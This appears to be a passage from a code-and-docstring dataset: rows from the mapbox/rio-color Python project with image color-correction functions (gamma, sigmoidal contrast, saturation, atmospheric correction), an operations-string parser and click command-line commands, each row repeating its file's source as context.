).format(gamma_g=gamma_g, gamma_b=gamma_b, contrast=contrast, bias=bias)
return ops
def _op_factory(func, kwargs, opname, bands, rgb_op=False):
"""create an operation function closure
don't call directly, use parse_operations
returns a function which itself takes and returns ndarrays
"""
def f(arr):
# Avoid mutation by copying
newarr = arr.copy()
if rgb_op:
# apply func to array's first 3 bands, assumed r,g,b
# additional band(s) are untouched
newarr[0:3] = func(newarr[0:3], **kwargs)
else:
# apply func to array band at a time
for b in bands:
newarr[b - 1] = func(arr[b - 1], **kwargs)
return newarr
f.__name__ = str(opname)
return f
def parse_operations(ops_string):
"""Takes a string of operations written with a handy DSL
"OPERATION-NAME BANDS ARG1 ARG2 OPERATION-NAME BANDS ARG"
And returns a list of functions, each of which take and return ndarrays
"""
band_lookup = {"r": 1, "g": 2, "b": 3}
count = len(band_lookup)
opfuncs = {"saturation": saturation, "sigmoidal": sigmoidal, "gamma": gamma}
opkwargs = {
"saturation": ("proportion",),
"sigmoidal": ("contrast", "bias"),
"gamma": ("g",),
}
# Operations that assume RGB colorspace
rgb_ops = ("saturation",)
# split into tokens, commas are optional whitespace
tokens = [x.strip() for x in ops_string.replace(",", "").split(" ")]
operations = []
current = []
for token in tokens:
if token.lower() in opfuncs.keys():
if len(current) > 0:
operations.append(current)
current = []
current.append(token.lower())
if len(current) > 0:
operations.append(current)
result = []
for parts in operations:
opname = parts[0]
bandstr = parts[1]
args = parts[2:]
try:
func = opfuncs[opname]
except KeyError:
raise ValueError("{} is not a valid operation".format(opname))
if opname in rgb_ops:
# ignore bands, assumed to be in rgb
# push 2nd arg into args
args = [bandstr] + args
bands = (1, 2, 3)
else:
# 2nd arg is bands
# parse r,g,b ~= 1,2,3
bands = set()
for bs in bandstr:
try:
band = int(bs)
except ValueError:
band = band_lookup[bs.lower()]
if band < 1 or band > count:
raise ValueError(
"{} BAND must be between 1 and {}".format(opname, count)
)
bands.add(band)
# assume all args are float
args = [float(arg) for arg in args]
kwargs = dict(zip(opkwargs[opname], args))
# Create opperation function
f = _op_factory(
func=func,
kwargs=kwargs,
opname=opname,
bands=bands,
rgb_op=(opname in rgb_ops),
)
result.append(f)
return result
|
mapbox/rio-color | rio_color/operations.py | _op_factory | python | def _op_factory(func, kwargs, opname, bands, rgb_op=False):
def f(arr):
# Avoid mutation by copying
newarr = arr.copy()
if rgb_op:
# apply func to array's first 3 bands, assumed r,g,b
# additional band(s) are untouched
newarr[0:3] = func(newarr[0:3], **kwargs)
else:
# apply func to array band at a time
for b in bands:
newarr[b - 1] = func(arr[b - 1], **kwargs)
return newarr
f.__name__ = str(opname)
return f | create an operation function closure
don't call directly, use parse_operations
returns a function which itself takes and returns ndarrays | train | https://github.com/mapbox/rio-color/blob/4e9d7a9348608e66f9381fcdba98c13050e91c83/rio_color/operations.py#L184-L204 | null | """Color operations."""
import numpy as np
from .utils import epsilon
from .colorspace import saturate_rgb
# Color manipulation functions
def sigmoidal(arr, contrast, bias):
    r"""Apply sigmoidal contrast to an array of color values.

    Sigmoidal contrast is a type of contrast control that adjusts the
    contrast without saturating highlights or shadows. It allows control
    over two factors: the contrast range from light to dark, and where
    the middle value of the mid-tones falls. The result is a non-linear
    and smooth contrast change.

    Parameters
    ----------
    arr : ndarray, float, 0 .. 1
        Array of color values to adjust
    contrast : integer
        Enhances the intensity differences between the lighter and darker
        elements of the image. For example, 0 is none, 3 is typical and
        20 is a lot. Negative values apply the inverse transfer function.
    bias : float, between 0 and 1
        Threshold level for the contrast function to center on
        (typically centered at 0.5)

    Returns
    -------
    ndarray
        Adjusted values, same shape as ``arr``, scaled to 0 .. 1.

    Raises
    ------
    ValueError
        If ``arr`` contains values outside 0 .. 1, or ``bias`` is
        outside 0 .. 1.

    Notes
    -----
    Sigmoidal contrast is based on the sigmoidal transfer function:

    .. math:: g(u) = ( 1/(1 + e^{- \alpha * u + \beta)})

    This sigmoid function is scaled so that the output is bound by
    the interval [0, 1].

    .. math:: ( 1/(1 + e^(\beta * (\alpha - u))) - 1/(1 + e^(\beta * \alpha)))/
        ( 1/(1 + e^(\beta*(\alpha - 1))) - 1/(1 + e^(\beta * \alpha)) )

    Where :math: `\alpha` is the threshold level, and :math: `\beta` the
    contrast factor to be applied.

    References
    ----------
    .. [CT] Hany Farid "Fundamentals of Image Processing"
        http://www.cs.dartmouth.edu/farid/downloads/tutorials/fip.pdf
    """
    if (arr.max() > 1.0 + epsilon) or (arr.min() < 0 - epsilon):
        raise ValueError("Input array must have float values between 0 and 1")

    if (bias > 1.0 + epsilon) or (bias < 0 - epsilon):
        raise ValueError("bias must be a scalar float between 0 and 1")

    alpha, beta = bias, contrast
    # The midpoint (alpha) must be non-zero for the transfer function
    # below; nudge it to the smallest representable positive value.
    if alpha == 0:
        alpha = epsilon
    # A zero contrast factor is the identity transform.
    if beta == 0:
        return arr

    # Suppress divide/invalid warnings only for this computation.
    # The previous np.seterr(...) call mutated numpy's process-wide
    # error state and never restored it; np.errstate is scoped.
    with np.errstate(divide="ignore", invalid="ignore"):
        if beta > 0:
            # Scaled sigmoid: (S(u) - S(0)) / (S(1) - S(0)) with
            # S(u) = 1 / (1 + exp(beta * (alpha - u)))
            numerator = 1 / (1 + np.exp(beta * (alpha - arr))) - 1 / (
                1 + np.exp(beta * alpha)
            )
            denominator = 1 / (1 + np.exp(beta * (alpha - 1))) - 1 / (
                1 + np.exp(beta * alpha)
            )
            output = numerator / denominator
        else:
            # Inverse sigmoidal function for negative contrast.
            # todo: account for 0s
            output = (
                (beta * alpha)
                - np.log(
                    (
                        1
                        / (
                            (arr / (1 + np.exp(beta * alpha - beta)))
                            - (arr / (1 + np.exp(beta * alpha)))
                            + (1 / (1 + np.exp(beta * alpha)))
                        )
                    )
                    - 1
                )
            ) / beta
    return output
def gamma(arr, g):
    r"""Apply power-law (gamma) correction to an array of color values.

    Values are adjusted pixel-by-pixel according to:

    .. math:: pixel_{out} = pixel_{in} ^ {1 / \gamma}

    so for inputs in 0..1, gamma (:math:`\gamma`) greater than 1.0
    lightens the image and gamma less than 1.0 darkens it.

    Parameters
    ----------
    arr : ndarray, float, 0 .. 1
        Array of color values to adjust.
    g : float
        Gamma value. Reasonable values range from 0.8 to 2.4.
    """
    out_of_range = (arr.max() > 1.0 + epsilon) or (arr.min() < 0 - epsilon)
    if out_of_range:
        raise ValueError("Input array must have float values between 0 and 1")
    if g <= 0 or np.isnan(g):
        raise ValueError("gamma must be greater than 0")
    return np.power(arr, 1.0 / g)
def saturation(arr, proportion):
    """Adjust the saturation of an RGB array (in LCH color space).

    Saturation is multiplied by ``proportion`` in LCH space: values
    toward 0 wash color out (0 yields grayscale), 1 leaves the image
    identical, and values above 1 intensify color.

    Parameters
    ----------
    arr : ndarray with shape (3, ..., ...)
        The R, G, B bands.
    proportion : number
        Saturation multiplier.
    """
    nbands = arr.shape[0]
    if nbands != 3:
        raise ValueError("saturation requires a 3-band array")
    return saturate_rgb(arr, proportion)
def simple_atmo_opstring(haze, contrast, bias):
    """Build the rio color operations string for a simple atmospheric
    correction: gamma on the green and blue bands plus a sigmoidal
    contrast stretch on all bands.
    """
    green_gamma = 1 - (haze / 3.0)
    blue_gamma = 1 - haze
    return "gamma g {}, gamma b {}, sigmoidal rgb {} {}".format(
        green_gamma, blue_gamma, contrast, bias
    )
def simple_atmo(rgb, haze, contrast, bias):
    """Apply a simple, static (non-adaptive) atmospheric correction.

    The green band is gamma-dampened slightly and the blue band more
    strongly, then a sigmoidal contrast stretch is applied to all
    three bands. Any bands beyond the first three pass through
    untouched.

    Parameters
    ----------
    rgb : ndarray
        Band-first array; the first three bands are treated as R, G, B.
    haze : float
        Amount of haze to adjust for. For example, 0.03.
    contrast : integer
        Contrast factor; 0 is none, 3 is typical and 20 is a lot.
    bias : float, between 0 and 1
        Threshold level for the contrast function to center on
        (typically 0.5 or 50%).
    """
    corrected = np.empty(shape=(3, rgb.shape[1], rgb.shape[2]))
    corrected[0] = rgb[0]
    corrected[1] = gamma(rgb[1], 1 - (haze / 3.0))
    corrected[2] = gamma(rgb[2], 1 - haze)

    output = rgb.copy()
    output[0:3] = sigmoidal(corrected, contrast, bias)
    return output
def parse_operations(ops_string):
    """Parse a string of operations written with a handy DSL.

    "OPERATION-NAME BANDS ARG1 ARG2 OPERATION-NAME BANDS ARG"

    Returns a list of functions, each of which takes and returns an
    ndarray, to be applied in order. Raises ``ValueError`` for unknown
    operation names or band numbers outside 1..3.
    """
    # Band letters map to 1-indexed band numbers.
    band_lookup = {"r": 1, "g": 2, "b": 3}
    count = len(band_lookup)
    opfuncs = {"saturation": saturation, "sigmoidal": sigmoidal, "gamma": gamma}
    # Positional-argument names for each operation, in DSL order.
    opkwargs = {
        "saturation": ("proportion",),
        "sigmoidal": ("contrast", "bias"),
        "gamma": ("g",),
    }
    # Operations that assume RGB colorspace
    rgb_ops = ("saturation",)
    # split into tokens, commas are optional whitespace
    tokens = [x.strip() for x in ops_string.replace(",", "").split(" ")]
    # Group tokens into one list per operation; a new group starts at
    # every recognized operation name.
    operations = []
    current = []
    for token in tokens:
        if token.lower() in opfuncs.keys():
            if len(current) > 0:
                operations.append(current)
                current = []
        current.append(token.lower())
    if len(current) > 0:
        operations.append(current)
    result = []
    for parts in operations:
        opname = parts[0]
        bandstr = parts[1]
        args = parts[2:]
        try:
            func = opfuncs[opname]
        except KeyError:
            raise ValueError("{} is not a valid operation".format(opname))
        if opname in rgb_ops:
            # ignore bands, assumed to be in rgb
            # push 2nd arg into args
            args = [bandstr] + args
            bands = (1, 2, 3)
        else:
            # 2nd arg is bands
            # parse r,g,b ~= 1,2,3
            bands = set()
            for bs in bandstr:
                try:
                    band = int(bs)
                except ValueError:
                    # NOTE(review): a band letter outside r/g/b raises
                    # KeyError here (only int() failures are caught) —
                    # confirm whether that is intentional.
                    band = band_lookup[bs.lower()]
                if band < 1 or band > count:
                    raise ValueError(
                        "{} BAND must be between 1 and {}".format(opname, count)
                    )
                bands.add(band)
        # assume all args are float
        args = [float(arg) for arg in args]
        kwargs = dict(zip(opkwargs[opname], args))
        # Create operation function
        f = _op_factory(
            func=func,
            kwargs=kwargs,
            opname=opname,
            bands=bands,
            rgb_op=(opname in rgb_ops),
        )
        result.append(f)
    return result
|
mapbox/rio-color | rio_color/operations.py | parse_operations | python | def parse_operations(ops_string):
band_lookup = {"r": 1, "g": 2, "b": 3}
count = len(band_lookup)
opfuncs = {"saturation": saturation, "sigmoidal": sigmoidal, "gamma": gamma}
opkwargs = {
"saturation": ("proportion",),
"sigmoidal": ("contrast", "bias"),
"gamma": ("g",),
}
# Operations that assume RGB colorspace
rgb_ops = ("saturation",)
# split into tokens, commas are optional whitespace
tokens = [x.strip() for x in ops_string.replace(",", "").split(" ")]
operations = []
current = []
for token in tokens:
if token.lower() in opfuncs.keys():
if len(current) > 0:
operations.append(current)
current = []
current.append(token.lower())
if len(current) > 0:
operations.append(current)
result = []
for parts in operations:
opname = parts[0]
bandstr = parts[1]
args = parts[2:]
try:
func = opfuncs[opname]
except KeyError:
raise ValueError("{} is not a valid operation".format(opname))
if opname in rgb_ops:
# ignore bands, assumed to be in rgb
# push 2nd arg into args
args = [bandstr] + args
bands = (1, 2, 3)
else:
# 2nd arg is bands
# parse r,g,b ~= 1,2,3
bands = set()
for bs in bandstr:
try:
band = int(bs)
except ValueError:
band = band_lookup[bs.lower()]
if band < 1 or band > count:
raise ValueError(
"{} BAND must be between 1 and {}".format(opname, count)
)
bands.add(band)
# assume all args are float
args = [float(arg) for arg in args]
kwargs = dict(zip(opkwargs[opname], args))
# Create opperation function
f = _op_factory(
func=func,
kwargs=kwargs,
opname=opname,
bands=bands,
rgb_op=(opname in rgb_ops),
)
result.append(f)
return result | Takes a string of operations written with a handy DSL
"OPERATION-NAME BANDS ARG1 ARG2 OPERATION-NAME BANDS ARG"
And returns a list of functions, each of which take and return ndarrays | train | https://github.com/mapbox/rio-color/blob/4e9d7a9348608e66f9381fcdba98c13050e91c83/rio_color/operations.py#L207-L286 | [
"def _op_factory(func, kwargs, opname, bands, rgb_op=False):\n \"\"\"create an operation function closure\n don't call directly, use parse_operations\n returns a function which itself takes and returns ndarrays\n \"\"\"\n\n def f(arr):\n # Avoid mutation by copying\n newarr = arr.copy()... | """Color operations."""
import numpy as np
from .utils import epsilon
from .colorspace import saturate_rgb
# Color manipulation functions
def sigmoidal(arr, contrast, bias):
r"""
Sigmoidal contrast is type of contrast control that
adjusts the contrast without saturating highlights or shadows.
It allows control over two factors:
the contrast range from light to dark, and where the middle value
of the mid-tones falls. The result is a non-linear and smooth
contrast change.
Parameters
----------
arr : ndarray, float, 0 .. 1
Array of color values to adjust
contrast : integer
Enhances the intensity differences between the lighter and darker
elements of the image. For example, 0 is none, 3 is typical and
20 is a lot.
bias : float, between 0 and 1
Threshold level for the contrast function to center on
(typically centered at 0.5)
Notes
----------
Sigmoidal contrast is based on the sigmoidal transfer function:
.. math:: g(u) = ( 1/(1 + e^{- \alpha * u + \beta)})
This sigmoid function is scaled so that the output is bound by
the interval [0, 1].
.. math:: ( 1/(1 + e^(\beta * (\alpha - u))) - 1/(1 + e^(\beta * \alpha)))/
( 1/(1 + e^(\beta*(\alpha - 1))) - 1/(1 + e^(\beta * \alpha)) )
Where :math: `\alpha` is the threshold level, and :math: `\beta` the
contrast factor to be applied.
References
----------
.. [CT] Hany Farid "Fundamentals of Image Processing"
http://www.cs.dartmouth.edu/farid/downloads/tutorials/fip.pdf
"""
if (arr.max() > 1.0 + epsilon) or (arr.min() < 0 - epsilon):
raise ValueError("Input array must have float values between 0 and 1")
if (bias > 1.0 + epsilon) or (bias < 0 - epsilon):
raise ValueError("bias must be a scalar float between 0 and 1")
alpha, beta = bias, contrast
# We use the names a and b to match documentation.
if alpha == 0:
alpha = epsilon
if beta == 0:
return arr
np.seterr(divide="ignore", invalid="ignore")
if beta > 0:
numerator = 1 / (1 + np.exp(beta * (alpha - arr))) - 1 / (
1 + np.exp(beta * alpha)
)
denominator = 1 / (1 + np.exp(beta * (alpha - 1))) - 1 / (
1 + np.exp(beta * alpha)
)
output = numerator / denominator
else:
# Inverse sigmoidal function:
# todo: account for 0s
# todo: formatting ;)
output = (
(beta * alpha)
- np.log(
(
1
/ (
(arr / (1 + np.exp(beta * alpha - beta)))
- (arr / (1 + np.exp(beta * alpha)))
+ (1 / (1 + np.exp(beta * alpha)))
)
)
- 1
)
) / beta
return output
def gamma(arr, g):
r"""
Gamma correction is a nonlinear operation that
adjusts the image's channel values pixel-by-pixel according
to a power-law:
.. math:: pixel_{out} = pixel_{in} ^ {\gamma}
Setting gamma (:math:`\gamma`) to be less than 1.0 darkens the image and
setting gamma to be greater than 1.0 lightens it.
Parameters
----------
gamma (:math:`\gamma`): float
Reasonable values range from 0.8 to 2.4.
"""
if (arr.max() > 1.0 + epsilon) or (arr.min() < 0 - epsilon):
raise ValueError("Input array must have float values between 0 and 1")
if g <= 0 or np.isnan(g):
raise ValueError("gamma must be greater than 0")
return arr ** (1.0 / g)
def saturation(arr, proportion):
"""Apply saturation to an RGB array (in LCH color space)
Multiply saturation by proportion in LCH color space to adjust the intensity
of color in the image. As saturation increases, colors appear
more "pure." As saturation decreases, colors appear more "washed-out."
Parameters
----------
arr: ndarray with shape (3, ..., ...)
proportion: number
"""
if arr.shape[0] != 3:
raise ValueError("saturation requires a 3-band array")
return saturate_rgb(arr, proportion)
def simple_atmo_opstring(haze, contrast, bias):
"""Make a simple atmospheric correction formula."""
gamma_b = 1 - haze
gamma_g = 1 - (haze / 3.0)
ops = (
"gamma g {gamma_g}, " "gamma b {gamma_b}, " "sigmoidal rgb {contrast} {bias}"
).format(gamma_g=gamma_g, gamma_b=gamma_b, contrast=contrast, bias=bias)
return ops
def simple_atmo(rgb, haze, contrast, bias):
"""
A simple, static (non-adaptive) atmospheric correction function.
Parameters
----------
haze: float
Amount of haze to adjust for. For example, 0.03
contrast : integer
Enhances the intensity differences between the lighter and darker
elements of the image. For example, 0 is none, 3 is typical and
20 is a lot.
bias : float, between 0 and 1
Threshold level for the contrast function to center on
(typically centered at 0.5 or 50%)
"""
gamma_b = 1 - haze
gamma_g = 1 - (haze / 3.0)
arr = np.empty(shape=(3, rgb.shape[1], rgb.shape[2]))
arr[0] = rgb[0]
arr[1] = gamma(rgb[1], gamma_g)
arr[2] = gamma(rgb[2], gamma_b)
output = rgb.copy()
output[0:3] = sigmoidal(arr, contrast, bias)
return output
def _op_factory(func, kwargs, opname, bands, rgb_op=False):
"""create an operation function closure
don't call directly, use parse_operations
returns a function which itself takes and returns ndarrays
"""
def f(arr):
# Avoid mutation by copying
newarr = arr.copy()
if rgb_op:
# apply func to array's first 3 bands, assumed r,g,b
# additional band(s) are untouched
newarr[0:3] = func(newarr[0:3], **kwargs)
else:
# apply func to array band at a time
for b in bands:
newarr[b - 1] = func(arr[b - 1], **kwargs)
return newarr
f.__name__ = str(opname)
return f
|
mapbox/rio-color | rio_color/scripts/cli.py | check_jobs | python | def check_jobs(jobs):
if jobs == 0:
raise click.UsageError("Jobs must be >= 1 or == -1")
elif jobs < 0:
import multiprocessing
jobs = multiprocessing.cpu_count()
return jobs | Validate number of jobs. | train | https://github.com/mapbox/rio-color/blob/4e9d7a9348608e66f9381fcdba98c13050e91c83/rio_color/scripts/cli.py#L22-L30 | null | """Main CLI."""
import click
import rasterio
from rasterio.rio.options import creation_options
from rasterio.transform import guard_transform
from rio_color.workers import atmos_worker, color_worker
from rio_color.operations import parse_operations, simple_atmo_opstring
import riomucho
jobs_opt = click.option(
"--jobs",
"-j",
type=int,
default=1,
help="Number of jobs to run simultaneously, Use -1 for all cores, default: 1",
)
@click.command("color")
@jobs_opt
@click.option(
"--out-dtype",
"-d",
type=click.Choice(["uint8", "uint16"]),
help="Integer data type for output data, default: same as input",
)
@click.argument("src_path", type=click.Path(exists=True))
@click.argument("dst_path", type=click.Path(exists=False))
@click.argument("operations", nargs=-1, required=True)
@click.pass_context
@creation_options
def color(ctx, jobs, out_dtype, src_path, dst_path, operations, creation_options):
    """Color correction

    Operations will be applied to the src image in the specified order.

    Available OPERATIONS include:

    \b
        "gamma BANDS VALUE"
            Applies a gamma curve, brightening or darkening midtones.
            VALUE > 1 brightens the image.

    \b
        "sigmoidal BANDS CONTRAST BIAS"
            Adjusts the contrast and brightness of midtones.
            BIAS > 0.5 darkens the image.

    \b
        "saturation PROPORTION"
            Controls the saturation in LCH color space.
            PROPORTION = 0 results in a grayscale image
            PROPORTION = 1 results in an identical image
            PROPORTION = 2 is likely way too saturated

    BANDS are specified as a single arg, no delimiters

    \b
        `123` or `RGB` or `rgb` are all equivalent

    Example:

    \b
        rio color -d uint8 -j 4 input.tif output.tif \\
            gamma 3 0.95, sigmoidal rgb 35 0.13
    """
    # Read the profile and block layout up front; the source is reopened
    # later for the actual pixel reads.
    with rasterio.open(src_path) as src:
        opts = src.profile.copy()
        windows = [(window, ij) for ij, window in src.block_windows()]

    opts.update(**creation_options)
    opts["transform"] = guard_transform(opts["transform"])

    # Default the output dtype to the input's dtype.
    out_dtype = out_dtype if out_dtype else opts["dtype"]
    opts["dtype"] = out_dtype

    args = {"ops_string": " ".join(operations), "out_dtype": out_dtype}
    # Just run this for validation this time
    # parsing will be run again within the worker
    # where its returned value will be used
    try:
        parse_operations(args["ops_string"])
    except ValueError as e:
        # Surface DSL parse errors as CLI usage errors.
        raise click.UsageError(str(e))

    jobs = check_jobs(jobs)

    if jobs > 1:
        # Parallel path: riomucho fans windows out across worker processes.
        with riomucho.RioMucho(
            [src_path],
            dst_path,
            color_worker,
            windows=windows,
            options=opts,
            global_args=args,
            mode="manual_read",
        ) as mucho:
            mucho.run(jobs)
    else:
        # Sequential path: process one window at a time in this process.
        with rasterio.open(dst_path, "w", **opts) as dest:
            with rasterio.open(src_path) as src:
                rasters = [src]
                for window, ij in windows:
                    arr = color_worker(rasters, window, ij, args)
                    dest.write(arr, window=window)

            # Carry the band color interpretation over to the output.
            dest.colorinterp = src.colorinterp
@click.command("atmos")
@click.option(
"--atmo",
"-a",
type=click.FLOAT,
default=0.03,
help="How much to dampen cool colors, thus cutting through "
"haze. 0..1 (0 is none), default: 0.03.",
)
@click.option(
"--contrast",
"-c",
type=click.FLOAT,
default=10,
help="Contrast factor to apply to the scene. -infinity..infinity"
"(0 is none), default: 10.",
)
@click.option(
"--bias",
"-b",
type=click.FLOAT,
default=0.15,
help="Skew (brighten/darken) the output. Lower values make it "
"brighter. 0..1 (0.5 is none), default: 0.15",
)
@click.option(
"--out-dtype",
"-d",
type=click.Choice(["uint8", "uint16"]),
help="Integer data type for output data, default: same as input",
)
@click.option(
"--as-color",
is_flag=True,
default=False,
help="Prints the equivalent rio color command to stdout."
"Does NOT run either command, SRC_PATH will not be created",
)
@click.argument("src_path", required=True)
@click.argument("dst_path", type=click.Path(exists=False))
@jobs_opt
@creation_options
@click.pass_context
def atmos(
    ctx,
    atmo,
    contrast,
    bias,
    jobs,
    out_dtype,
    src_path,
    dst_path,
    creation_options,
    as_color,
):
    """Atmospheric correction
    """
    if as_color:
        # Dry-run mode: print the equivalent `rio color` command and
        # exit without creating DST_PATH.
        click.echo(
            "rio color {} {} {}".format(
                src_path, dst_path, simple_atmo_opstring(atmo, contrast, bias)
            )
        )
        exit(0)

    # Read the profile and block layout up front; the source is reopened
    # later for the actual pixel reads.
    with rasterio.open(src_path) as src:
        opts = src.profile.copy()
        windows = [(window, ij) for ij, window in src.block_windows()]

    opts.update(**creation_options)
    opts["transform"] = guard_transform(opts["transform"])

    # Default the output dtype to the input's dtype.
    out_dtype = out_dtype if out_dtype else opts["dtype"]
    opts["dtype"] = out_dtype

    args = {"atmo": atmo, "contrast": contrast, "bias": bias, "out_dtype": out_dtype}

    jobs = check_jobs(jobs)

    if jobs > 1:
        # Parallel path: riomucho fans windows out across worker processes.
        with riomucho.RioMucho(
            [src_path],
            dst_path,
            atmos_worker,
            windows=windows,
            options=opts,
            global_args=args,
            mode="manual_read",
        ) as mucho:
            mucho.run(jobs)
    else:
        # Sequential path: process one window at a time in this process.
        with rasterio.open(dst_path, "w", **opts) as dest:
            with rasterio.open(src_path) as src:
                rasters = [src]
                for window, ij in windows:
                    arr = atmos_worker(rasters, window, ij, args)
                    dest.write(arr, window=window)
|
mapbox/rio-color | rio_color/scripts/cli.py | color | python | def color(ctx, jobs, out_dtype, src_path, dst_path, operations, creation_options):
with rasterio.open(src_path) as src:
opts = src.profile.copy()
windows = [(window, ij) for ij, window in src.block_windows()]
opts.update(**creation_options)
opts["transform"] = guard_transform(opts["transform"])
out_dtype = out_dtype if out_dtype else opts["dtype"]
opts["dtype"] = out_dtype
args = {"ops_string": " ".join(operations), "out_dtype": out_dtype}
# Just run this for validation this time
# parsing will be run again within the worker
# where its returned value will be used
try:
parse_operations(args["ops_string"])
except ValueError as e:
raise click.UsageError(str(e))
jobs = check_jobs(jobs)
if jobs > 1:
with riomucho.RioMucho(
[src_path],
dst_path,
color_worker,
windows=windows,
options=opts,
global_args=args,
mode="manual_read",
) as mucho:
mucho.run(jobs)
else:
with rasterio.open(dst_path, "w", **opts) as dest:
with rasterio.open(src_path) as src:
rasters = [src]
for window, ij in windows:
arr = color_worker(rasters, window, ij, args)
dest.write(arr, window=window)
dest.colorinterp = src.colorinterp | Color correction
Operations will be applied to the src image in the specified order.
Available OPERATIONS include:
\b
"gamma BANDS VALUE"
Applies a gamma curve, brightening or darkening midtones.
VALUE > 1 brightens the image.
\b
"sigmoidal BANDS CONTRAST BIAS"
Adjusts the contrast and brightness of midtones.
BIAS > 0.5 darkens the image.
\b
"saturation PROPORTION"
Controls the saturation in LCH color space.
PROPORTION = 0 results in a grayscale image
PROPORTION = 1 results in an identical image
PROPORTION = 2 is likely way too saturated
BANDS are specified as a single arg, no delimiters
\b
`123` or `RGB` or `rgb` are all equivalent
Example:
\b
rio color -d uint8 -j 4 input.tif output.tif \\
gamma 3 0.95, sigmoidal rgb 35 0.13 | train | https://github.com/mapbox/rio-color/blob/4e9d7a9348608e66f9381fcdba98c13050e91c83/rio_color/scripts/cli.py#L46-L121 | [
"def color_worker(srcs, window, ij, args):\n \"\"\"A user function.\"\"\"\n src = srcs[0]\n arr = src.read(window=window)\n arr = to_math_type(arr)\n\n for func in parse_operations(args[\"ops_string\"]):\n arr = func(arr)\n\n # scaled 0 to 1, now scale to outtype\n return scale_dtype(arr... | """Main CLI."""
import click
import rasterio
from rasterio.rio.options import creation_options
from rasterio.transform import guard_transform
from rio_color.workers import atmos_worker, color_worker
from rio_color.operations import parse_operations, simple_atmo_opstring
import riomucho
jobs_opt = click.option(
"--jobs",
"-j",
type=int,
default=1,
help="Number of jobs to run simultaneously, Use -1 for all cores, default: 1",
)
def check_jobs(jobs):
    """Validate the requested number of jobs.

    A positive count is returned unchanged; any negative count means
    "use every available core"; zero is rejected with a usage error.
    """
    if jobs == 0:
        raise click.UsageError("Jobs must be >= 1 or == -1")
    if jobs > 0:
        return jobs
    import multiprocessing

    return multiprocessing.cpu_count()
@click.command("color")
@jobs_opt
@click.option(
"--out-dtype",
"-d",
type=click.Choice(["uint8", "uint16"]),
help="Integer data type for output data, default: same as input",
)
@click.argument("src_path", type=click.Path(exists=True))
@click.argument("dst_path", type=click.Path(exists=False))
@click.argument("operations", nargs=-1, required=True)
@click.pass_context
@creation_options
@click.command("atmos")
@click.option(
"--atmo",
"-a",
type=click.FLOAT,
default=0.03,
help="How much to dampen cool colors, thus cutting through "
"haze. 0..1 (0 is none), default: 0.03.",
)
@click.option(
"--contrast",
"-c",
type=click.FLOAT,
default=10,
help="Contrast factor to apply to the scene. -infinity..infinity"
"(0 is none), default: 10.",
)
@click.option(
"--bias",
"-b",
type=click.FLOAT,
default=0.15,
help="Skew (brighten/darken) the output. Lower values make it "
"brighter. 0..1 (0.5 is none), default: 0.15",
)
@click.option(
"--out-dtype",
"-d",
type=click.Choice(["uint8", "uint16"]),
help="Integer data type for output data, default: same as input",
)
@click.option(
"--as-color",
is_flag=True,
default=False,
help="Prints the equivalent rio color command to stdout."
"Does NOT run either command, SRC_PATH will not be created",
)
@click.argument("src_path", required=True)
@click.argument("dst_path", type=click.Path(exists=False))
@jobs_opt
@creation_options
@click.pass_context
def atmos(
ctx,
atmo,
contrast,
bias,
jobs,
out_dtype,
src_path,
dst_path,
creation_options,
as_color,
):
"""Atmospheric correction
"""
if as_color:
click.echo(
"rio color {} {} {}".format(
src_path, dst_path, simple_atmo_opstring(atmo, contrast, bias)
)
)
exit(0)
with rasterio.open(src_path) as src:
opts = src.profile.copy()
windows = [(window, ij) for ij, window in src.block_windows()]
opts.update(**creation_options)
opts["transform"] = guard_transform(opts["transform"])
out_dtype = out_dtype if out_dtype else opts["dtype"]
opts["dtype"] = out_dtype
args = {"atmo": atmo, "contrast": contrast, "bias": bias, "out_dtype": out_dtype}
jobs = check_jobs(jobs)
if jobs > 1:
with riomucho.RioMucho(
[src_path],
dst_path,
atmos_worker,
windows=windows,
options=opts,
global_args=args,
mode="manual_read",
) as mucho:
mucho.run(jobs)
else:
with rasterio.open(dst_path, "w", **opts) as dest:
with rasterio.open(src_path) as src:
rasters = [src]
for window, ij in windows:
arr = atmos_worker(rasters, window, ij, args)
dest.write(arr, window=window)
|
mapbox/rio-color | rio_color/scripts/cli.py | atmos | python | def atmos(
ctx,
atmo,
contrast,
bias,
jobs,
out_dtype,
src_path,
dst_path,
creation_options,
as_color,
):
if as_color:
click.echo(
"rio color {} {} {}".format(
src_path, dst_path, simple_atmo_opstring(atmo, contrast, bias)
)
)
exit(0)
with rasterio.open(src_path) as src:
opts = src.profile.copy()
windows = [(window, ij) for ij, window in src.block_windows()]
opts.update(**creation_options)
opts["transform"] = guard_transform(opts["transform"])
out_dtype = out_dtype if out_dtype else opts["dtype"]
opts["dtype"] = out_dtype
args = {"atmo": atmo, "contrast": contrast, "bias": bias, "out_dtype": out_dtype}
jobs = check_jobs(jobs)
if jobs > 1:
with riomucho.RioMucho(
[src_path],
dst_path,
atmos_worker,
windows=windows,
options=opts,
global_args=args,
mode="manual_read",
) as mucho:
mucho.run(jobs)
else:
with rasterio.open(dst_path, "w", **opts) as dest:
with rasterio.open(src_path) as src:
rasters = [src]
for window, ij in windows:
arr = atmos_worker(rasters, window, ij, args)
dest.write(arr, window=window) | Atmospheric correction | train | https://github.com/mapbox/rio-color/blob/4e9d7a9348608e66f9381fcdba98c13050e91c83/rio_color/scripts/cli.py#L167-L220 | [
"def atmos_worker(srcs, window, ij, args):\n \"\"\"A simple atmospheric correction user function.\"\"\"\n src = srcs[0]\n rgb = src.read(window=window)\n rgb = to_math_type(rgb)\n\n atmos = simple_atmo(rgb, args[\"atmo\"], args[\"contrast\"], args[\"bias\"])\n\n # should be scaled 0 to 1, scale to... | """Main CLI."""
import click
import rasterio
from rasterio.rio.options import creation_options
from rasterio.transform import guard_transform
from rio_color.workers import atmos_worker, color_worker
from rio_color.operations import parse_operations, simple_atmo_opstring
import riomucho
jobs_opt = click.option(
"--jobs",
"-j",
type=int,
default=1,
help="Number of jobs to run simultaneously, Use -1 for all cores, default: 1",
)
def check_jobs(jobs):
    """Validate number of jobs.

    Returns ``jobs`` for positive values, the machine's CPU count for
    negative values, and raises ``click.UsageError`` for zero.
    """
    if jobs == 0:
        # Zero workers is meaningless; require >= 1 or the -1 sentinel.
        raise click.UsageError("Jobs must be >= 1 or == -1")
    elif jobs < 0:
        # Any negative value is treated as "use all available cores".
        import multiprocessing

        jobs = multiprocessing.cpu_count()
    return jobs
@click.command("color")
@jobs_opt
@click.option(
"--out-dtype",
"-d",
type=click.Choice(["uint8", "uint16"]),
help="Integer data type for output data, default: same as input",
)
@click.argument("src_path", type=click.Path(exists=True))
